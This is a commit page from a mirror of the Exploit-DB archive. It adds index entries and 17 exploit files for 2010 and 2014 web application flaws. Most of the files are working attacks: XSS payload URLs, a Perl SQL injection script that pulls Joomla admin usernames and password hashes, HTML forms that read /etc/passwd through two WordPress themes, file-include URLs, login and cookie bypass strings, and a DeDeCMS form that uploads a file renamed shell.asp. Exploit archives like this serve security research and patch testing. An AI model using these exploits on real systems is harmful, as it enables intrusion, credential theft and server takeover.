bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 06_10_2014

Browse source
This commit is contained in:
Offensive Security 2014-06-10 04:38:25 +00:00
parent 32619a65bd
commit f8588487ce
18 changed files with 297 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

17
files.csv
View file

@ -30335,3 +30335,20 @@ id,file,description,date,author,platform,type,port
33663,platforms/multiple/remote/33663.txt,"IBM WebSphere Portal 6.0.1.5 Build wp6015 Portlet Palette Search HTML Injection Vulnerability",2010-02-19,"Sjoerd Resink",multiple,remote,0
33664,platforms/multiple/remote/33664.html,"Mozilla Firefox <= 3.5.8 Style Sheet Redirection Information Disclosure Vulnerability",2010-01-09,"Cesar Cerrudo",multiple,remote,0
33665,platforms/php/webapps/33665.txt,"Softbiz Jobs 'sbad_type' Parameter Cross Site Scripting Vulnerability",2010-02-23,"pratul agrawal",php,webapps,0
33667,platforms/php/webapps/33667.txt,"Wordpress Theme Elegance - Post Local File Disclosure",2014-06-08,"felipe andrian",php,webapps,0
33668,platforms/php/webapps/33668.txt,"Wordpress Theme Infocus - Post Local File Disclosure",2014-06-08,"felipe andrian",php,webapps,0
33671,platforms/php/webapps/33671.txt,"MySmartBB 1.7 Multiple Cross Site Scripting Vulnerabilities",2010-02-24,indoushka,php,webapps,0
33673,platforms/php/webapps/33673.pl,"HD FLV Player Component for Joomla! 'id' Parameter SQL Injection Vulnerability",2010-02-24,kaMtiEz,php,webapps,0
33674,platforms/php/webapps/33674.txt,"OpenInferno OI.Blogs 1.0 Multiple Local File Include Vulnerabilities",2010-02-24,JIKO,php,webapps,0
33675,platforms/jsp/webapps/33675.txt,"Multiple IBM Products Login Page Cross Site Scripting Vulnerability",2010-02-25,"Oren Hafif",jsp,webapps,0
33676,platforms/php/webapps/33676.txt,"Newbie CMS 0.0.2 Insecure Cookie Authentication Bypass Vulnerability",2010-02-25,JIKO,php,webapps,0
33678,platforms/jsp/webapps/33678.txt,"ARISg 5.0 'wflogin.jsp' Cross Site Scripting Vulnerability",2010-02-26,"Yaniv Miron",jsp,webapps,0
33679,platforms/php/webapps/33679.txt,"TRUC 0.11 'login_reset_password_page.php' Cross Site Scripting Vulnerability",2010-02-28,snakespc,php,webapps,0
33680,platforms/php/webapps/33680.txt,"Open Educational System 0.1 beta 'CONF_INCLUDE_PATH' Parameter Multiple Remote File Include Vulnerabilities",2010-02-28,"cr4wl3r ",php,webapps,0
33681,platforms/php/webapps/33681.txt,"SLAED CMS 4 Installation Script Unauthorized Access Vulnerability",2010-02-27,indoushka,php,webapps,0
33682,platforms/multiple/remote/33682.txt,"Oracle Siebel 7.7/7.8 'loyalty_enu/start.swe' Cross Site Scripting Vulnerability",2010-03-01,Lament,multiple,remote,0
33683,platforms/php/webapps/33683.txt,"Article Friendly 'filename' Parameter Local File Include Vulnerability",2010-03-01,"pratul agrawal",php,webapps,0
33684,platforms/php/webapps/33684.txt,"Blax Blog 0.1 'girisyap.php' SQL Injection Vulnerability",2010-03-01,"cr4wl3r ",php,webapps,0
33685,platforms/php/webapps/33685.html,"DeDeCMS 5.5 '_SESSION[dede_admin_id]' Parameter Authentication Bypass Vulnerability",2010-03-01,"Wolves Security Team",php,webapps,0
33686,platforms/multiple/remote/33686.txt,"IBM Lotus Domino 7.0.2 'readme.nsf' Cross Site Scripting Vulnerability",2010-03-02,"Nahuel Grisolia",multiple,remote,0
33687,platforms/java/webapps/33687.txt,"Sparta Systems TrackWise EQMS Multiple Cross-Site Scripting Vulnerabilities",2010-03-02,"Yaniv Miron",java,webapps,0

Can't render this file because it is too large.

9
platforms/java/webapps/33687.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/38483/info
Sparta Systems TrackWise EQMS is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/[TrackWiseDir]/servlet/TeamAccess/Login/"><script>alert(&#039;XSS-By-Lament&#039;)</script>
http://www.example.com/[TrackWiseDir]/servlet/TeamAccess/BatchEditProgress.html/"><script>alert(&#039;XSS-By-Lament&#039;)</script>

13
platforms/jsp/webapps/33675.txt Executable file
View file

@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/38412/info
Multiple IBM products are prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
This issue affects IBM Lotus Web Content Management, WebSphere Portal, and Lotus Quickr.
http://www.example.com/wps/wcm/webinterface/login/login.jsp?";><script>maliciou s_script</script><b%20"
http://www.example.com/wps/wcm/webinterface/login/login.jsp?"; style="tr:expression(malicious_script)

9
platforms/jsp/webapps/33678.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/38441/info
ARISg is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
ARISg 5.0 is vulnerable; other versions may also be affected.
http://www.example.com/Aris/wflogin.jsp?errmsg=XSS msg<script>alert('Test XSS')</script>

9
platforms/multiple/remote/33682.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/38456/info
Oracle Siebel is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Oracle Siebel 7.7 and 7.8 are vulnerable; other versions may also be affected.
http://www.example.com/htim_enu/start.swe/?>'"><script>alert('XSS by Lament')</script>

9
platforms/multiple/remote/33686.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/38481/info
IBM Lotus Domino is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
Lotus Domino 7.0.2 is vulnerable; other versions may also be affected.
http://www.example.com/help/readme.nsf/Header?OpenPage=&BaseTarget=%22;//%20--%3E%3C/script%3E%3Cscript%3Ealert%28%27XSS%27%29;%3C/script%3E

24
platforms/php/webapps/33667.txt Executable file
View file

@ -0,0 +1,24 @@
[+] Post Local File Disclosure in wordpress theme Elegance
[+] Date: 07/06/2014
[+] CWE Number: CWE-98
[+] Risk: High
[+] Author: Felipe Andrian Peixoto
[+] Dork:inurl:"/wp-content/themes/elegance/"
[+] Vendor Homepage: http://www.elegantthemes.com/
[+] Contact: felipe_andrian@hotmail.com
[+] Tested on: Windows 7 and Linux
[+] Vulnerable File: dl-skin.php
[+] Exploit :
<html>
<body>
<form action="http://www.site.com/wp-content/themes/elegance/lib/scripts/dl-skin.php" method="post">
Download:<input type="text" name="_mysite_download_skin" value="/etc/passwd"><br>
<input type="submit">
</form>
</body>
</html>
eof

32
platforms/php/webapps/33668.txt Executable file
View file

@ -0,0 +1,32 @@
[+] Post Local File Disclosure in wordpress theme Infocus
[+] Date: 07/06/2014
[+] CWE Number: CWE-98
[+] Risk: High
[+] Author: Felipe Andrian Peixoto
[+] Dork:inurl:"/wp-content/themes/infocus/"
[+] Vendor Homepage: http://themeforest.net/item/infocus-powerful-professional-wordpress-theme/85486
[+] Contact: felipe_andrian@hotmail.com
[+] Tested on: Windows 7 and Linux
[+] Vulnerable File: dl-skin.php
[+] Exploit :
<html>
<body>
<form action="http://www.site.com/wp-content/themes/infocus/lib/scripts/dl-skin.php" method="post">
Download:<input type="text" name="_mysite_download_skin" value="/etc/passwd"><br>
<input type="submit">
</form>
</body>
</html>
eof

15
platforms/php/webapps/33671.txt Executable file
View file

@ -0,0 +1,15 @@
source: http://www.securityfocus.com/bid/38385/info
MySmartBB is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
The issues affect MySmartBB 1.7.0; other versions may also be affected.
http://www.example.com/MySBB/misc.php/>'><ScRiPt>alert(469588561854)</ScRiPt>
http://www.example.com/MySBB/index.php/>'><ScRiPt>alert(213771818860)</ScRiPt>
http://www.example.com/memberlist.php/>'><ScRiPt>alert(213771818860)</ScRiPt>
http://www.example.com/MySBB/new.php/>'><ScRiPt>alert(213771818860)</ScRiPt>
http://www.example.com/MySBB/pm.php/>'><ScRiPt>alert(213771818860)</ScRiPt>
http://www.example.com/MySBB/register.php/>'><ScRiPt>alert(213771818860)</ScRiPt>
http://www.example.com/MySBB/search.php/>'><ScRiPt>alert(213771818860)</ScRiPt>

68
platforms/php/webapps/33673.pl Executable file
View file

@ -0,0 +1,68 @@
source: http://www.securityfocus.com/bid/38401/info
The HD FLV Player component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
#!/usr/bin/perl -w
###############################################################################################
#
# [~] Joomla Component com_hdflvplayer SQL injection exploit - (id)
# [~] Author : kaMtiEz (kamzcrew@yahoo.com)
# [~] Homepage : http://www.indonesiancoder.com
# [~] Date : 15 February, 2010
#
###############################################################################################
#
# [ Software Information ]
#
# [+] Vendor : http://www.hdflvplayer.net/
# [+] Price : $ 99.00
# [+] Vulnerability : SQL injection
# [+] Dork : inurl:"CIHUY"
# [+] Type : commercial
#
###############################################################################################
#
# USAGE : perl kaMz.pl
#
###############################################################################################
print "\t\t[!]=========================================================[!]\n\n";
print "\t\t [~] INDONESIANCODER TEAM [~] \n\n";
print "\t\t[!]=========================================================[!]\n\n";
print "\t\t [!]Joomla component com_hdflvplayer SQL injection exploit[!] \n\n";
print "\t\t [~] by kaMtiEz [~] \n\n";
print "\t\t[!]=========================================================[!]\n\n";
use LWP::UserAgent;
print "\nsite/path[!]http://www.indonesiancoder.com/kaMz/[!]:";
chomp(my $IBL13Z=<STDIN>);
$kaMtiEz="concat(username,0x3a,password)";
$tukulesto="jos_users";
$pathloader="com_hdflvplayer";
$r3m1ck = LWP::UserAgent->new() or die "Could not initialize browser\n";
$r3m1ck->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$arianom = $IBL13Z . "/index.php?option=".$pathloader."&id=1+AND+1=2+UNION+SELECT+".$kaMtiEz.",1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+".$tukulesto."--";
$gonzhack = $r3m1ck->request(HTTP::Request->new(GET=>$arianom));
$contrex = $gonzhack->content; if ($contrex =~/([0-9a-fA-F]{32})/){
print "\n[+] CIHUY Admin Password Nya GAN [+]: $1\n\n";
}
else{print "\n[+] Exploit GAGAL GAN ![+]\n";
}
##############################################################################################
#
# GREETZZZZZ :
#
# INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW MainHack ServerIsDown SurabayaHackerLink IndonesianHacker SoldierOfAllah
# tukulesto,M3NW5,arianom,tiw0L,abah_benu,d0ntcry,newbie_043,bobyhikaru,gonzhack
# Contrex,onthel,yasea,bugs,Ronz,Pathloader,cimpli,MarahMerah,ibl13z,r3m1ck
# Coracore,Gh4mb4s,Jack-,VycOd,m0rgue a.k.a mbamboenk
#
##############################################################################################

16
platforms/php/webapps/33674.txt Executable file
View file

@ -0,0 +1,16 @@
source: http://www.securityfocus.com/bid/38402/info
OpenInferno OI.Blogs is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker can exploit these vulnerabilities to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.
OpenInferno OI.Blogs 1.0.0 is vulnerable; other versions may also be affected.
The following example URIs are available:
http://www.example.com/templates/loadStyles.php?theme=file%00
http://www.example.com/sources/javascript/loadScripts.php?scripts=[file]%00
The following example data is available:
javascript:document.cookie="installerFile=[FIle];path='/upload/admin/plugins'

11
platforms/php/webapps/33676.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/38421/info
Newbie CMS is prone to an authentication-bypass vulnerability because it fails to adequately verify user-supplied input used for cookie-based authentication.
Attackers can exploit this vulnerability to gain administrative access to the affected application, which may aid in further attacks.
Versions prior to Newbie CMS 0.03 are vulnerable; other versions may also be affected.
Supplying the following cookie data is sufficient to exploit this issue:
javascript:document.cookie="nb_logged=jiko;path=/newbb/admin/";

10
platforms/php/webapps/33679.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/38445/info
TRUC is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
TRUC 0.11.0 is vulnerable; other versions may also be affected.
http://www.example.com/truc/login_reset_password_page.php?failed=true&error="><script>alert(document.cookie);</script>

12
platforms/php/webapps/33680.txt Executable file
View file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/38449/info
Open Educational System is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues may allow an attacker to compromise the application and the computer; other attacks are also possible.
Open Educational System 0.1 beta and prior versions are vulnerable.
http://www.example.com/[path]/admin/modules/modules/forum/admin.php?CONF_INCLUDE_PATH=attacker's site
http://www.example.com/[path]/admin/modules/modules/plotgraph/index.php?CONF_INCLUDE_PATH=attacker's site
http://www.example.com/[path]/admin/modules/user_account/admin_user/mod_admuser.php?CONF_INCLUDE_PATH=attacker's site
http://www.example.com/[path]/admin/modules/user_account/ogroup/mod_group.php?CONF_INCLUDE_PATH=attacker's site

13
platforms/php/webapps/33681.txt Executable file
View file

@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/38453/info
SLAED CMS is prone to an unauthorized-access vulnerability.
Attackers can exploit this issue to obtain unauthorized access to installation scripts.
SLAED CMS 4 is vulnerable; other versions may also be affected.
The following example URIs are available:
http://www.example.com/sd/setup.php?op=language&lang=1
http://www.example.com/sd/install/index.php?op=language&lang=1

9
platforms/php/webapps/33683.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/38461/info
Article Friendly is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability to obtain potentially sensitive information and execute arbitrary local scripts in the context of the webserver process. This may allow the attacker to compromise the application and the underlying computer; other attacks are also possible.
Article Friendly Pro is vulnerable; other versions may also be affected.
http://www.example.com/admin/index.php?filename=../../../../../../../../../../etc/passwd%00

12
platforms/php/webapps/33684.txt Executable file
View file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/38465/info
Blax Blog is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Blax Blog 0.1 is vulnerable; other versions may also be affected.
http://www.example.com/admin/girisyap.php
Username: ' or '1=1
password: ' or '1=1

9
platforms/php/webapps/33685.html Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/38469/info
DeDeCMS is prone to an authentication-bypass vulnerability because it fails to adequately verify user-supplied input.
Attackers can exploit this issue to gain unauthorized access to the affected application.
DeDeCMS GBK 5.5 is vulnerable; other versions may also be affected.
<form action="" method='POST' enctype="multipart/form-data"> U&nbsp;R&nbsp;L:<input type="text" name="target" size="50" value="http://192.168.1.110">&nbsp;&nbsp; Path:<input type="text" name="path" value="/DedeCmsV55-GBK-Final/uploads/include/dialog/select_soft_post.php" size="90"><br> File:&nbsp;<input type='file' name='uploadfile' size='25' />(Filetype must be GIF/JPEG etc)&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; RenameTo:<input type='test' name='newname' value="shell.asp."/><br> &nbsp; <input type=hidden name="_SESSION[dede_admin_id]" value=1> <input type=hidden name="bkurl" value=1> <input type='button' value='submit' onclick="fsubmit()"/><br><br><br><br><br><br> dedecms 0day exp..<br> need: session.auto_start = 1<br> By toby57 2010/2/22 </form> <script> function fsubmit(){ var form = document.forms[0]; form.action = form.target.value + form.path.value; tmpstr = form.target.value +'/'+ form.newname.value; form.bkurl.value = tmpstr.substr(0,tmpstr.length-1); form.submit(); } </script>